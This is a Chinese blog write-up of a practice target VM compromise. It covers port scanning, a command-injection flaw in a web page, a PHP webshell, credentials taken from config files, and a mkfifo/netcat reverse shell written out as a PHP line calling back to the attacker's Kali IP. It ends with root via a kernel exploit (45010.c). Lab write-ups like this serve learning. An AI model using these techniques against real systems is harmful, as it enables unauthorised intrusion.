对目标靶机进行信息收集,利用arp-scan -l 或nmap获取同网段的ip地址
![](https://i-blog.csdnimg.cn/blog_migrate/990c7e57a456c77d723e503a086696a3.png)
kali ip:192.168.56.104,靶机ip地址:192.168.56.118
对靶机端口进行探测,命令在之前的项目中都有。
![](https://i-blog.csdnimg.cn/blog_migrate/0400b72290afeaf5c64d4baa46ac166c.png)
发现了21、80端口,对其80端口进行访问,发现了/site/目录
![](https://i-blog.csdnimg.cn/blog_migrate/aa8285c1fc42f181fd6aed00999dffcf.png)
点击后进入主页,发现了三个标签,在主页到处点点
![](https://i-blog.csdnimg.cn/blog_migrate/361527d1f77fce21d776b4a581ba8f3c.png)
发现在标签buscar处出现了下图的地址
![](https://i-blog.csdnimg.cn/blog_migrate/bc185c0ae78ae0ef08fa2e990e6c170d.png)
浅浅的试一下看有没有远程命令执行漏洞,果不其然
![](https://i-blog.csdnimg.cn/blog_migrate/d6762c87bb9e63c44134acd0d41a1c50.png)
![](https://i-blog.csdnimg.cn/blog_migrate/1f1db342d337cb04654f9700a294aff2.png)
那就可以反弹shell了,但是,试了好几个,都不行,猜测应该是做了某些限制,那就换种思路
![](https://i-blog.csdnimg.cn/blog_migrate/e38c214f85358925fb9184a203bd4f0d.png)
反弹失败,利用echo,向一个php文件写入一句话木马,然后利用蚁剑进行连接
![](https://i-blog.csdnimg.cn/blog_migrate/aa234b002f1ae5db013a922fa77969ca.png)
![](https://i-blog.csdnimg.cn/blog_migrate/92b45a1ee3bf2c776c6a68fd2825dcac.png)
![](https://i-blog.csdnimg.cn/blog_migrate/5bf7ba9404503d0434fdf95bd1876606.png)
连接成功,经过一番搜寻后发现了个和项目名字一样的用户名,里面有个user.txt
![](https://i-blog.csdnimg.cn/blog_migrate/da91366acb5425a5cbd2a77c075e7277.png)
查看后发现是一串字符串
![](https://i-blog.csdnimg.cn/blog_migrate/3e9fb8a970e623f33b852fbbb8aa034a.png)
然后找到了config.php文件,发现了用户名和密码
![](https://i-blog.csdnimg.cn/blog_migrate/22e6d4417a2e2466442f62c97120e442.png)
同时在另一个地方也发现备份文件,里面有用户名和密码
![](https://i-blog.csdnimg.cn/blog_migrate/ef433ce954e759399c678b0da574101c.png)
试着登录ftp服务器,找了一圈没什么可以用的
![](https://i-blog.csdnimg.cn/blog_migrate/42b9d803d7d1eb409b9b2af4967e70ac.png)
虽然已经用蚁剑连接了,但是没有getshell还是不太舒服,在蚁剑的终端里写个反弹shell的文件2.php,具体内容如下所示:
![](https://i-blog.csdnimg.cn/blog_migrate/476351b05a64248a55f130398040b657.png)
![](https://i-blog.csdnimg.cn/blog_migrate/8c7f9239dc2f02a862fd7c858f127778.png)
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.104 443 >/tmp/f");?>
尝试了很多端口都不行,这个443端口可以,猜测应该是做了限制。在kali上开启监听,在web端访问这个文件,反弹成功!
![](https://i-blog.csdnimg.cn/blog_migrate/445ed91b83eea110a7d2c64f4349b2e2.png)
查看服务器是否安装了python,利用python改成交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
![](https://i-blog.csdnimg.cn/blog_migrate/f2ac40fef969dc9a25c7315dd2dc000c.png)
收集下linux信息,发现是ubuntu16.04 4.4.0版本
![](https://i-blog.csdnimg.cn/blog_migrate/2190c7f9e64e3a321b1b5e7c89baa3cc.png)
在本地看看有没有可以用的exp,发现了45010.c文件,该文件能本地提权
![](https://i-blog.csdnimg.cn/blog_migrate/7b70f1a19e1b4cebf6d14205777dc6b4.png)
将其复制到项目文件里,然后可以用蚁剑上传,也可以开启kali的web服务,在shell中下载
![](https://i-blog.csdnimg.cn/blog_migrate/07a7ca059d24256768990396aefbb8aa.png)
这边选择方便的蚁剑进行上传
![](https://i-blog.csdnimg.cn/blog_migrate/3483aae5cdea76d5ca49a703fd99b274.png)
![](https://i-blog.csdnimg.cn/blog_migrate/4ed64bfa26f0f0281198a7c7c76e80d5.png)
上传之后进行编译,输出为exp1,给exp1赋权,执行exp1
![](https://i-blog.csdnimg.cn/blog_migrate/fe0a0328885d14a2099cbed2f951c96e.png)
提权成功!获取了最后的flag文件!
![](https://i-blog.csdnimg.cn/blog_migrate/ed408c966da0f696c08b2638532aebcb.png)
最近比较忙!找个简单的项目练练手感,还是不错的。
每天学习一丢丢,进步一丢丢!